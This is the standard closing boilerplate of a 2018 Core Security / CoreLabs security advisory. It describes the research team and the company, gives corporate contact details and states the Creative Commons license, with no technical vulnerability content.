CoreLabs, the research center of Core Security, A Fortra Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is composed of seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2018 Core Security and © 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>